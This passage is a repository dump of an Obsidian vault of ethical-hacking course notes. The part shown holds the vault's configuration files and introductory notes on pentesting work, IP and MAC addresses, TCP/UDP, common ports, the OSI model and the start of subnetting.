├── .DS_Store ├── .obsidian ├── app.json ├── appearance.json ├── community-plugins.json ├── core-plugins-migration.json ├── core-plugins.json ├── graph.json ├── hotkeys.json ├── plugins │ ├── obsidian-discordrpc │ │ ├── data.json │ │ ├── main.js │ │ └── manifest.json │ ├── obsidian-git │ │ ├── data.json │ │ ├── main.js │ │ ├── manifest.json │ │ └── styles.css │ ├── obsidian-mind-map │ │ ├── main.js │ │ └── manifest.json │ └── table-editor-obsidian │ │ ├── data.json │ │ ├── main.js │ │ ├── manifest.json │ │ └── styles.css ├── themes │ └── Catppuccin │ │ ├── manifest.json │ │ └── theme.css └── workspace.json ├── Practical Ethical Hacking - The Complete Course ├── .DS_Store ├── 01. Introduction │ ├── 01. Course Introduction.md │ └── 02. A Day in the Life of an Ethical Hacker.md ├── 02. Notekeeping │ └── 01. Effective Notekeeping.md ├── 03. Networking Refresher │ ├── 00. image │ │ ├── Network Refresher - OSI Model.png │ │ ├── Network Refresher - Private IP Address.jpg │ │ ├── Network Refresher - Subnetting.webp │ │ └── Subnetting Part 1 & 2 Exel sheet.png │ ├── 01. Introduction.md │ ├── 02. IP Addresses.md │ ├── 03. MAC Addresses.md │ ├── 04. TCP, UDP and the Three Way Handshake.md │ ├── 05. Common Ports and Protocols.md │ ├── 06. The OSI Model.md │ └── 07. Subnetting Part 1 & 2.md ├── 04. Introduction to Linux │ ├── 01. Exploring Kali Linux.md │ ├── 02. Sudo Overview.md │ ├── 03. Navigating the File System.md │ ├── 04. Users and Privileges.md │ ├── 05. Common Network Commands.md │ ├── 06. Viewing, Creating, and Editing Files.md │ ├── 07. Starting and Stopping Services.md │ ├── 08. Installing and Updating Tools.md │ └── 09. Scripting with Bash.md ├── 05. Introduction to Python │ ├── 01. Introduction.md │ ├── 02. Strings.md │ ├── 03. Math.md │ ├── 04. Variables and Methods.md │ ├── 05. Functions.md │ ├── 06. Boolean Expressions and Relational Operators.md │ ├── 07. Conditional Statements.md │ ├── 08. Lists.md │ ├── 09. Tuples.md │ ├── 10. Looping.md │ ├── 11. Advanced Strings.md │ ├── 12. Dictionaries.md │ ├── 13. Importing Modules.md │ ├── 14. Sockets.md │ ├── 15. Building a Port Scanner.md │ ├── 16. User Input.md │ ├── 17. Reading and Writing Files.md │ ├── 18. Classes and Objects.md │ └── 19. Building a Shoe Budget Tool.md ├── 06. The Ethical Hacker Methodology │ ├── 00. Image │ │ └── The Five Stages of Ethical Hacking 01.png │ └── 01. The Five Stages of Ethical Hacking.md ├── 07. Information Gathering (Reconnaissance) │ ├── 00. image │ │ ├── Passive Reconnaissance Overview 01.png │ │ └── Passive Reconnaissance Overview 02.png │ ├── 01. Passive Reconnaissance Overview.md │ ├── 02. Gathering Email and Breached Credentials.md │ ├── 03. Hunting Subdomains Part 1, 2.md │ ├── 04. Identifying Website Technologies.md │ └── 05. Google Fu.md ├── 10. Exploitation Basics │ ├── 01. Shells & Payloads.md │ └── 02. Brute Force Attacks, Credential Stuffing & Password Spraying.md ├── 11. New Capstone │ ├── 00. image │ │ ├── Capstone Academy01.png │ │ ├── Capstone Academy02.png │ │ ├── Capstone Dev01.png │ │ ├── Capstone Dev02.png │ │ └── Capstone Dev03.png │ ├── 01. Blue.md │ ├── 02. Academy.md │ ├── 03. Dev.md │ └── 04. Blackpearl.md ├── 12. Active Directory Overview │ ├── 01. Active Directory Overview.md │ └── 02. Physical & Logical AD Components.md ├── 14. Attacking Active Directory (Initial Attack Vectors) │ ├── .DS_Store │ ├── 00. image │ │ ├── .DS_Store │ │ ├── LLMNR Poisoning Overview 01.png │ │ ├── Passback Attacks 01.webp │ │ ├── Passback Attacks 02.webp │ │ ├── Passback Attacks 03.webp │ │ └── Passback Attacks 04.webp │ ├── 01. LLMNR Poisoning Overview.md │ ├── 02. Capturing Hashes with Responder.md │ ├── 03. Cracking Our Captured Hashes.md │ ├── 04. LLMNR Poison Mitigation.md │ ├── 05. SMB Relay Attacks Overview.md │ ├── 06. SMB Relay Attacks Lab.md │ ├── 07. SMB Relay Attack Defenses.md │ ├── 08. Gaining Shell Access.md │ ├── 09. IPv6 Attacks Overview.md │ ├── 10. IPv6 DNS Takeover via mitm6.md │ ├── 11. IPv6 Attack Defenses.md │ ├── 12. Passback Attacks.md │ └── 13. Initial Internal Attack Strategy.md ├── 15. Attacking Active Directory (Post-Compromise Enumeration) │ ├── 00. image │ │ ├── domain enumeration with ldapdomaindump 01.png │ │ └── domain enumeration with plumhound 01.png │ ├── 01. Domain Enumeration with ldapdomaindump.md │ ├── 02. Domain Enumeration with Bloodhound.md │ └── 03. Domain Enumeration with Plumhound.md ├── 16. Attacking Active Directory (Post-Compromise Attacks) │ ├── 00. image │ │ └── kerberosting overview 01.png │ ├── 01. Pass Attacks Overview.md │ ├── 01.5. Crackmapexec large Cheatsheet.md │ ├── 02. Pass Attacks.md │ ├── 03. Dumping and Cracking Hashes.md │ ├── 04. Pass Attack Mitigations.md │ ├── 05. Kerberoasting Overview.md │ ├── 06. Kerberosting Walkthrough.md │ ├── 07. Kerberoasting Mitigation.md │ ├── 08. Token Impersonation Overview.md │ ├── 10. Token Impersonation Mitigation.md │ ├── Mimikatz Overview & Credential Dumping.md │ └── Mimikatz large Cheatsheet.md ├── 17. We've Compromised the Domain - Now What │ └── 01. Post-Domain Compromise Attack Strategy.md ├── 20. Post Exploitation │ ├── 00. Image │ │ └── pivoting.webp │ ├── 01. File Transfers Review.md │ ├── 02. Maintaining Access Overview.md │ ├── 03. Pivoting.md │ └── Cleaning Up.md ├── 21. Web Application Enumeration, Revisited │ ├── 01. Finding Subdomains with Assetfinder.md │ ├── 02. Finding Subdomains with Amass.md │ ├── 03. Finding Alive Domains with Httprobe.md │ ├── 04. Screenshotting Websites with GoWitness.md │ └── 05. Automating the Enumeration Process.md ├── 22. Find & Exploit Common Web Vulnerabilities │ └── 01. SQL Injection - UNION.md └── 23. Wireless Penetration Testing │ ├── 01. Wireless Penetration Testing Overview.md │ └── 02. WPA PS2 Exploit Walkthrough.md └── README.md /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/.DS_Store -------------------------------------------------------------------------------- /.obsidian/app.json: -------------------------------------------------------------------------------- 1 | { 2 | "promptDelete": false, 3 | "alwaysUpdateLinks": true 4 | } -------------------------------------------------------------------------------- /.obsidian/appearance.json: -------------------------------------------------------------------------------- 1 | { 2 | "accentColor": "", 3 | "cssTheme": "Catppuccin", 4 | "baseFontSize": 16, 5 | "nativeMenus": false 6 | } -------------------------------------------------------------------------------- /.obsidian/community-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "obsidian-git", 3 | "obsidian-discordrpc", 4 | "obsidian-mind-map", 5 | "table-editor-obsidian" 6 | ] -------------------------------------------------------------------------------- /.obsidian/core-plugins-migration.json: -------------------------------------------------------------------------------- 1 | { 2 | "file-explorer": true, 3 | "global-search": true, 4 | "switcher": true, 5 | "graph": true, 6 | "backlink": true, 7 | "canvas": true, 8 | "outgoing-link": true, 9 | "tag-pane": true, 10 | "properties": false, 11 | "page-preview": true, 12 | "daily-notes": true, 13 | "templates": true, 14 | "note-composer": true, 15 | "command-palette": true, 16 | "slash-command": false, 17 | "editor-status": true, 18 | "bookmarks": true, 19 | "markdown-importer": false, 20 | "zk-prefixer": false, 21 | "random-note": false, 22 | "outline": true, 23 | "word-count": true, 24 | "slides": false, 25 | "audio-recorder": false, 26 | "workspaces": false, 27 | "file-recovery": true, 28 | "publish": false, 29 | "sync": false 30 | } -------------------------------------------------------------------------------- /.obsidian/core-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "file-explorer", 3 | "global-search", 4 | "switcher", 5 | "graph", 6 | "backlink", 7 | "canvas", 8 | "outgoing-link", 9 | "tag-pane", 10 | "page-preview", 11 | "daily-notes", 12 | "templates", 13 | "note-composer", 14 | "command-palette", 15 | "editor-status", 16 | "bookmarks", 17 | "outline", 18 | "word-count", 19 | "file-recovery" 20 | ] -------------------------------------------------------------------------------- /.obsidian/graph.json: -------------------------------------------------------------------------------- 1 | { 2 | "collapse-filter": false, 3 | "search": "", 4 | "showTags": false, 5 | "showAttachments": false, 6 | "hideUnresolved": false, 7 | "showOrphans": true, 8 | "collapse-color-groups": true, 9 | "colorGroups": [], 10 | "collapse-display": true, 11 | "showArrow": false, 12 | "textFadeMultiplier": 0, 13 | "nodeSizeMultiplier": 1, 14 | "lineSizeMultiplier": 1, 15 | "collapse-forces": false, 16 | "centerStrength": 0.420328776041667, 17 | "repelStrength": 7.73274739583333, 18 | "linkStrength": 0.44677734375, 19 | "linkDistance": 297, 20 | "scale": 1.0453226881348727, 21 | "close": true 22 | } -------------------------------------------------------------------------------- /.obsidian/hotkeys.json: -------------------------------------------------------------------------------- 1 | { 2 | "obsidian-git:commit": [ 3 | { 4 | "modifiers": [ 5 | "Mod", 6 | "Shift" 7 | ], 8 | "key": "C" 9 | } 10 | ], 11 | "obsidian-git:push2": [ 12 | { 13 | "modifiers": [ 14 | "Mod", 15 | "Shift" 16 | ], 17 | "key": "V" 18 | } 19 | ], 20 | "obsidian-git:pull": [ 21 | { 22 | "modifiers": [ 23 | "Mod", 24 | "Shift" 25 | ], 26 | "key": "X" 27 | } 28 | ], 29 | "obsidian-mind-map:app:markmap-preview": [ 30 | { 31 | "modifiers": [ 32 | "Mod", 33 | "Shift" 34 | ], 35 | "key": "M" 36 | } 37 | ] 38 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-discordrpc/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "showVaultName": true, 3 | "showCurrentFileName": true, 4 | "showPopups": true, 5 | "customVaultName": "", 6 | "showFileExtension": true, 7 | "useLoadedTime": true, 8 | "connectOnStart": true, 9 | "autoHideStatusBar": true 10 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-discordrpc/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-discordrpc", 3 | "name": "Discord Rich Presence", 4 | "version": "1.5.1", 5 | "description": "Update your Discord Status to show your friends what you are working on in Obsidian. With Discord Rich Presence.", 6 | "author": "Luke Leppan", 7 | "authorUrl": "https://lukeleppan.com", 8 | "isDesktopOnly": true 9 | } 10 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-git/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "commitMessage": "vault backup: {{date}}", 3 | "commitDateFormat": "YYYY-MM-DD HH:mm:ss", 4 | "autoSaveInterval": 0, 5 | "autoPushInterval": 0, 6 | "autoPullInterval": 0, 7 | "autoPullOnBoot": true, 8 | "disablePush": false, 9 | "pullBeforePush": true, 10 | "disablePopups": false, 11 | "listChangedFilesInMessageBody": false, 12 | "showStatusBar": true, 13 | "updateSubmodules": false, 14 | "syncMethod": "merge", 15 | "customMessageOnAutoBackup": false, 16 | "autoBackupAfterFileChange": false, 17 | "treeStructure": false, 18 | "refreshSourceControl": true, 19 | "basePath": "", 20 | "differentIntervalCommitAndPush": false, 21 | "changedFilesInStatusBar": false, 22 | "showedMobileNotice": true, 23 | "refreshSourceControlTimer": 7000, 24 | "showBranchStatusBar": true, 25 | "setLastSaveToLastCommit": true, 26 | "submoduleRecurseCheckout": false, 27 | "gitDir": "", 28 | "showFileMenu": true, 29 | "lineAuthor": { 30 | "show": false, 31 | "followMovement": "inactive", 32 | "authorDisplay": "initials", 33 | "showCommitHash": false, 34 | "dateTimeFormatOptions": "date", 35 | "dateTimeFormatCustomString": "YYYY-MM-DD HH:mm", 36 | "dateTimeTimezone": "viewer-local", 37 | "coloringMaxAge": "1y", 38 | "colorNew": { 39 | "r": 255, 40 | "g": 150, 41 | "b": 150 42 | }, 43 | "colorOld": { 44 | "r": 120, 45 | "g": 160, 46 | "b": 255 47 | }, 48 | "textColorCss": "var(--text-muted)", 49 | "ignoreWhitespace": false, 50 | "gutterSpacingFallbackLength": 5, 51 | "lastShownAuthorDisplay": "initials", 52 | "lastShownDateTimeFormatOptions": "date" 53 | }, 54 | "autoCommitMessage": "vault backup: {{date}}" 55 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-git/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-git", 3 | "name": "Git", 4 | "description": "Backup your vault with Git.", 5 | "isDesktopOnly": false, 6 | "fundingUrl": "https://ko-fi.com/vinzent", 7 | "js": "main.js", 8 | "version": "2.24.1" 9 | } 10 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-mind-map/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-mind-map", 3 | "name": "Mind Map", 4 | "version": "1.1.0", 5 | "description": "A plugin to preview notes as Markmap mind maps", 6 | "isDesktopOnly": false, 7 | "js": "main.js" 8 | } -------------------------------------------------------------------------------- /.obsidian/plugins/table-editor-obsidian/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "formatType": "normal", 3 | "showRibbonIcon": true, 4 | "bindEnter": true, 5 | "bindTab": true 6 | } -------------------------------------------------------------------------------- /.obsidian/plugins/table-editor-obsidian/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "table-editor-obsidian", 3 | "name": "Advanced Tables", 4 | "author": "Tony Grosinger", 5 | "authorUrl": "https://grosinger.net", 6 | "description": "Improved table navigation, formatting, manipulation, and formulas", 7 | "isDesktopOnly": false, 8 | "minAppVersion": "1.0.0", 9 | "version": "0.21.0", 10 | "js": "main.js", 11 | "fundingUrl": { 12 | "Github Sponsor": "https://github.com/sponsors/tgrosinger", 13 | "Buy me a Coffee": "https://buymeacoffee.com/tgrosinger", 14 | "Paypal": "https://paypal.me/tgrosinger" 15 | }, 16 | "donation": "https://buymeacoffee.com/tgrosinger" 17 | } -------------------------------------------------------------------------------- /.obsidian/plugins/table-editor-obsidian/styles.css: -------------------------------------------------------------------------------- 1 | :root { 2 | --advanced-tables-helper-size: 28px; 3 | } 4 | 5 | .HyperMD-table-row span.cm-inline-code { 6 | font-size: 100%; 7 | padding: 0px; 8 | } 9 | 10 | .advanced-tables-buttons>div>.title { 11 | font-weight: var(--font-medium); 12 | font-size: var(--nav-item-size); 13 | color: var(--nav-item-color); 14 | text-decoration: underline; 15 | } 16 | 17 | [data-type="advanced-tables-toolbar"] .nav-buttons-container { 18 | column-gap: 0.2rem; 19 | margin: 0.2rem 0 0.2rem 0; 20 | justify-content: start; 21 | } 22 | 23 | [data-type="advanced-tables-toolbar"] .nav-buttons-container::before { 24 | min-width: 2.6rem; 25 | line-height: var(--advanced-tables-helper-size); 26 | font-size: var(--nav-item-size); 27 | font-weight: var(--nav-item-weight); 28 | color: var(--nav-item-color); 29 | } 30 | 31 | [data-type="advanced-tables-toolbar"] .nav-buttons-container>* { 32 | height: var(--advanced-tables-helper-size); 33 | line-height: var(--advanced-tables-helper-size); 34 | } 35 | 36 | [data-type="advanced-tables-toolbar"] .nav-buttons-container .nav-action-button { 37 | width: var(--advanced-tables-helper-size); 38 | height: var(--advanced-tables-helper-size); 39 | display: flex; 40 | justify-content: center; 41 | align-items: center; 42 | border-radius: var(--radius-s); 43 | } 44 | 45 | [data-type="advanced-tables-toolbar"] .nav-buttons-container .nav-action-button:hover { 46 | background-color: var(--nav-item-background-hover); 47 | color: var(--nav-item-color-hover); 48 | font-weight: var(--nav-item-weight-hover); 49 | } 50 | 51 | .advanced-tables-row-label { 52 | width: 50px; 53 | } 54 | 55 | .widget-icon { 56 | width: 20px; 57 | height: 20px; 58 | fill: var(--text-muted); 59 | } 60 | 61 | .widget-icon:hover { 62 | fill: var(--text-normal); 63 | } 64 | 65 | .advanced-tables-csv-export textarea { 66 | height: 200px; 67 | width: 100%; 68 | } 69 | 70 | .advanced-tables-donation { 71 | width: 70%; 72 | margin: 0 auto; 73 | text-align: center; 74 | } 75 | 76 | .advanced-tables-donate-button { 77 | margin: 10px; 78 | } -------------------------------------------------------------------------------- /.obsidian/themes/Catppuccin/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Catppuccin", 3 | "version": "0.4.18", 4 | "minAppVersion": "1.0.0", 5 | "author": "Marshall Beckrich", 6 | "authorUrl": "https://github.com/catppuccin/obsidian" 7 | } 8 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/.DS_Store -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/01. Introduction/01. Course Introduction.md: -------------------------------------------------------------------------------- 1 | # Course Introduction 2 | > 11.11.2023 3 | --- 4 | 5 | **What is ethical hacking** 6 | - Try to hack into company (hired) 7 | - Breaking into network 8 | - Webserver hacking 9 | - OSINT 10 | - Plane hacking 11 | - We have permission to hack!!! 12 | 13 | **Requirements** 14 | - Basic IT knowledge 15 | - 12GB RAM required 16 | - Wireless Hacking: wireless adapter that supports monitor mode 17 | - Active Directory: 16GB RAM -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/01. Introduction/02. A Day in the Life of an Ethical Hacker.md: -------------------------------------------------------------------------------- 1 | # A Day in the Life of an Ethical Hacker 2 | > 11.11.2023 3 | --- 4 | 5 | **A Pentesters Day to Day** 6 | - Perform an Assessment 7 | - Write a Report 8 | - Give a Debrief 9 | - Talk about our findings 10 | 11 | **Assessment: External Network Pentest** 12 | - Assessing an organization's security from outside the network, property. 13 | - Focuses heavily on OSINT (Opensource Intelligence) / Collect data that might be beneficial. 14 | - Lasts about 32-40 hours for Pentest + 6-16 hours for report. Depends on the scope. 15 | 16 | **Assessment: Internal Network Pentest** 17 | - Assessing an organization's security from inside the network, property. 18 | - Focuses heavily on Active Directory. 19 | - Lasts about 32-40 hours for Pentest + 8-16 hours for report. Depends on the scope. 20 | 21 | **Assessment: Web Application Pentest** 22 | - Assessing an organization's web app / web server. 23 | - Focuses heavily on web based attacks and the [OWASP](https://owasp.org) 24 | - Focuses on wireless attacks. Depends on the wireless type that is being used (WPA2-PSK vs WPA2 Enterprise) 25 | - Lasts about 4-8 hours per SSID. 2-4 hours for report. 26 | 27 | **Assessment: Physical Pentest & Social Engineering** 28 | - Assessing an organization's physical security aka social engineering(break into the building, picking locks, cloning tags, social engineering). Fishing campaign, Smithing campaign (Social Engineering) Depends on the client. 29 | - Focuses on task and goals from the client. 30 | - Lasts about 16-40 hours. 4-8 for report. Depends on the engagement. 31 | 32 | **Other Assessments** 33 | - Mobile Pentesting 34 | - IOT (Internet of things) Pentesting 35 | - Red Team Engagement 36 | - Purple Team Engagement 37 | - ETC. 38 | 39 | **Report Writing** 40 | - Delivered withing a week after the engagement (Depends) 41 | - Report should be non technical and technical findings 42 | - Recommendations for remediation should be clear to both executives and technical staff. (It should be very clear!). Also write how you got in and how one could patch it. 43 | 44 | **Debrief** 45 | - A walkthrough through the report and finding. Can be with someone technical or non technical staff 46 | - Gives opportunity for the client to ask questions and concerns before the final report is released. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/02. Notekeeping/01. Effective Notekeeping.md: -------------------------------------------------------------------------------- 1 | # Effective Notekeeping 2 | > 11.11.2023 3 | --- 4 | 5 | - Break down in certain Domains 6 | - Under Domains, subdomains 7 | - Notes under each section 8 | - Insert code in notes 9 | - Break down in sections. Enumeration, Privilege escalation, 10 | - Pictures are important! 11 | - List of commands / attacks for each sections 12 | 13 | **Screenshot tools** 14 | [GreenShot](https://getgreenshot.org/downloads) 15 | [FlameShot](https://flameshot.org/) -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Network Refresher - OSI Model.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Network Refresher - OSI Model.png -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Network Refresher - Private IP Address.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Network Refresher - Private IP Address.jpg -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Network Refresher - Subnetting.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Network Refresher - Subnetting.webp -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Subnetting Part 1 & 2 Exel sheet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Subnetting Part 1 & 2 Exel sheet.png -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/03. Networking Refresher/01. Introduction.md: -------------------------------------------------------------------------------- 1 | # Introduction 2 | > 12.11.2023 3 | --- 4 | 5 | - IP Addresses 6 | - MAC Addresses 7 | - TCP, UDP and Three Way Handshake 8 | - Common Ports and Protocols 9 | - The OSI Model 10 | - Subnetting 11 | 12 | **The OSI Model** 13 | ![[Network Refresher - OSI Model.png]] 14 | 15 | **Subnetting** 16 | ![[Network Refresher - Subnetting.webp]] 17 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/03. Networking Refresher/02. IP Addresses.md: -------------------------------------------------------------------------------- 1 | # IP Addresses 2 | > 12.11.2023 3 | --- 4 | 5 | **Displaying the IP address** 6 | ``` 7 | ifconfig / linux 8 | ipconfig / windows 9 | ``` 10 | 11 | **IPv4** 12 | IPv4 addresses are *32-bit numerical addresses* represented in a dotted-decimal format, such as "192.168.0.1". Each section, or *octet*, of the address consists of *8 bits* and can range *from 0 to 255*. This allows for a total of approximately *4.3 billion unique addresses*. 13 | 14 | **IPv6** 15 | IPv6 addresses are *128-bit addresses* represented in a hexadecimal format, such as "2001:0db8:85a3:0000:0000:8a2e:0370:7334". The longer address length of IPv6 allows for a significantly larger number of unique addresses, approximately *3.4×10^38. IPv6 addresses* are *divided into eight groups* of *four hexadecimal digits*, separated by colons. *Leading zeros within a group can be omitted, and consecutive groups of zeros can be represented by a double colon (::)* to simplify the address. 16 | 17 | **Summary** 18 | In summary, IPv4 and IPv6 are versions of the Internet Protocol that provide an unique addresses to devices on a network. IPv4 are addresses with 32 bit, and IPv6 addresses with 128 bit. IPv6 offers a larger address space and additional features compared to IPv4. 19 | 20 | **Private IP Addresses** 21 | ![[Network Refresher - Private IP Address.jpg]] 22 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/03. Networking Refresher/03. MAC Addresses.md: -------------------------------------------------------------------------------- 1 | # MAC Addresses 2 | > 12.11.2023 3 | --- 4 | 5 | MAC addresses (*Media Access Control*) is a *identifier assigned to network capable devices that's being signed by the manufacture*. A MAC are typically *48 bits in length* which is represented by *6 pairs of hexadecimal digits*, separated by hyphens or colons. "00:1A:2B:3C:4D:5E". The *first 3 pairs* of digits represents the *manufacturer* of the network card. The *last 3 pairs* are *unique identifier for the specific device*. 6 | 7 | MAC addresses are *important in Ethernet networks* It allows devices to communicate with each other within the network. When data is sent from one device to another, *it is encapsulated within Ethernet frames that contain the destination MAC*. Routers forward the data to the destination. 8 | 9 | MAC addresses are *specific to the local network* and do *not have global uniqueness like IP addresses*. They are *only relevant within the scope of the local network segment*. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/03. Networking Refresher/04. TCP, UDP and the Three Way Handshake.md: -------------------------------------------------------------------------------- 1 | # TCP, UDP and the Three Way Handshake 2 | > 12.11.2023 3 | --- 4 | 5 | **TCP and UDP Overview:** 6 | - *TCP (Transmission Control Protocol)* and *UDP (User Datagram Protocol)* are *transport layer* protocols in computer networks. 7 | - TCP is *connection-oriented*, ensuring *reliable, ordered, and error-checked data delivery*. 8 | - UDP is *connectionless, simpler, and lightweight*, suitable for *applications tolerating data loss* or delay. 9 | 10 | **TCP Characteristics:** 11 | - *Guarantees correct data delivery* through mechanisms like acknowledgement, retransmission, and flow control. 12 | - *Breaks data into packets*, assigns sequence numbers, and ensures proper reassembly. 13 | - *Widely used for applications* requiring guaranteed delivery, e.g., web browsing, email, file transfer. 14 | 15 | **UDP Characteristics:** 16 | - *Does not establish connections or guarantee packet delivery*, making it suitable for real-time applications. 17 | - *Commonly used for streaming media*, online gaming, DNS, and VoIP. 18 | 19 | **Three-Way Handshake (TCP):** 20 | - Process to *establish a connection before data transmission*. 21 | - *SYN (Synchronize)*: Client sends SYN packet to the server. 22 | - *SYN-ACK (Synchronize-Acknowledge)*: Server responds with SYN and ACK flags set. 23 | - *ACK (Acknowledge)*: Client acknowledges SYN-ACK, confirming connection establishment. 24 | 25 | **Post-Handshake Connection:** 26 | - After the three-way handshake, devices are ready to exchange data. 27 | - Sequence numbers ensure correct order of data transmission and reception. 28 | 29 | **Summary:** 30 | - *TCP is reliable* and connection-oriented, ensuring data delivery. 31 | - *UDP is simpler* and connectionless, suitable for applications tolerating some data loss. 32 | - T*he three-way handshake* involves SYN, SYN-ACK, and ACK packets for TCP connection establishment. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/03. Networking Refresher/05. Common Ports and Protocols.md: -------------------------------------------------------------------------------- 1 | # Common Ports and Protocols 2 | > 12.11.2023 3 | --- 4 | 5 | Important ports and protocols in networking: 6 | 7 | **FTP (File Transfer Protocol):** 8 | - Port: 21 (TCP) 9 | 10 | **SSH (Secure Shell):** 11 | - Port: 22 (TCP) 12 | 13 | **Telnet:** 14 | - Port: 23 (TCP) 15 | 16 | **SMTP (Simple Mail Transfer Protocol):** 17 | - Port: 25 (TCP) 18 | 19 | **DNS (Domain Name System):** 20 | - Port: 53 (TCP and UDP) 21 | 22 | **HTTP (Hypertext Transfer Protocol):** 23 | - Port: 80 (TCP) 24 | 25 | **HTTPS (Hypertext Transfer Protocol Secure):** 26 | - Port: 443 (TCP) 27 | 28 | **DHCP (Dynamic Host Configuration Protocol):** 29 | - Ports: 67 (UDP), 68 (UDP) 30 | 31 | **POP3 (Post Office Protocol version 3):** 32 | - Port: 110 (TCP) 33 | 34 | **IMAP (Internet Message Access Protocol):** 35 | - Port: 143 (TCP) 36 | 37 | **SNMP (Simple Network Management Protocol):** 38 | - Port: 161 (UDP) 39 | 40 | **RDP (Remote Desktop Protocol):** 41 | - Port: 3389 (TCP) 42 | 43 | **NTP (Network Time Protocol):** 44 | - Port: 123 (UDP) 45 | 46 | **SMB (Server Message Block):** 47 | - Port: 445 (TCP) 48 | 49 | **FTPS (FTP over SSL/TLS):** 50 | - Port: 990 (TCP) 51 | 52 | **TFTP (Trivial File Transfer Protocol):** 53 | - Port: 69 (UDP) 54 | 55 | **LDAP (Lightweight Directory Access Protocol):** 56 | - Port: 389 (TCP and UDP) 57 | 58 | **MySQL:** 59 | - Port: 3306 (TCP) 60 | 61 | Note: Some protocols use both TCP and UDP, and these port assignments are not exhaustive; other applications may use different ports. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/03. Networking Refresher/06. The OSI Model.md: -------------------------------------------------------------------------------- 1 | # The OSI Model 2 | > 12.11.2023 3 | --- 4 | 5 | The *OSI (Open Systems Interconnection) model* is a *framework organizing communication systems into seven layers*, each with specific functions. This structured approach aids in *understanding and designing network protocols*. 6 | 7 | **Mnemonic** 8 | 9 | ``` 10 | Please / Physical Layer 11 | Do / Data Link Layer 12 | Not / Network Layer 13 | Throw / Transport Layer 14 | Sausage / Session Layer 15 | Pizza / Presentation Layer 16 | Away / Application Layer 17 | ``` 18 | 19 | ![[Network Refresher - OSI Model.png]] 20 | 21 | **Physical Layer:** 22 | - Handles *raw data transmission* over a physical medium. 23 | - *Defines electrical, mechanical, and functional* characteristics. 24 | 25 | **Data Link Layer:** 26 | - Ensures *reliable data frame transmission* between connected nodes. 27 | - *Manages error detection*, correction, flow control, and medium access. 28 | 29 | **Network Layer:** 30 | - *Routes data packets* across networks. 31 | - *Deals with logical addressing* and determines the best path using protocols like IP. 32 | 33 | **Transport Layer:** 34 | - *Ensures reliable data delivery* between end systems. 35 | - *Manages segmentation*, end-to-end communication, error recovery, and flow control with protocols like TCP and UDP. 36 | 37 | **Session Layer:** 38 | - *Establishes*, manages, and terminates *communication sessions*. 39 | - *Provides synchronization*, dialog control, checkpointing, and recovery. 40 | 41 | **Presentation Layer:** 42 | - *Handles data representation*, encryption, compression, and formatting. 43 | - *Ensures* data sent by one system is understandable by another. 44 | 45 | **Application Layer:** 46 | - *Closest to the end-user*, providing services like file transfer, email, and web browsing. 47 | - Includes protocols such as *HTTP*, *SMTP*, *FTP*, and *DNS*. 48 | 49 | **Key Idea:** 50 | - OSI model *divides network communication into manageable layers*, promoting interoperability, ease of implementation, and troubleshooting. 51 | - It's a *conceptual model*, *not always reflecting exact system implementations*, but remains a valuable reference for understanding network communication and protocols. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/03. Networking Refresher/07. Subnetting Part 1 & 2.md: -------------------------------------------------------------------------------- 1 | # Subnetting Part 1 & 2 2 | > 12.11.2023 3 | --- 4 | 5 | *Subnetting* is the process of *breaking a network into smaller parts* called *subnets*, *enhancing IP address efficiency* and aiding network management. This technique involves *borrowing bits* from the *host section of an IP address* to create *subnet identifiers*, *dividing the network into multiple subnets*, each with its *unique IP 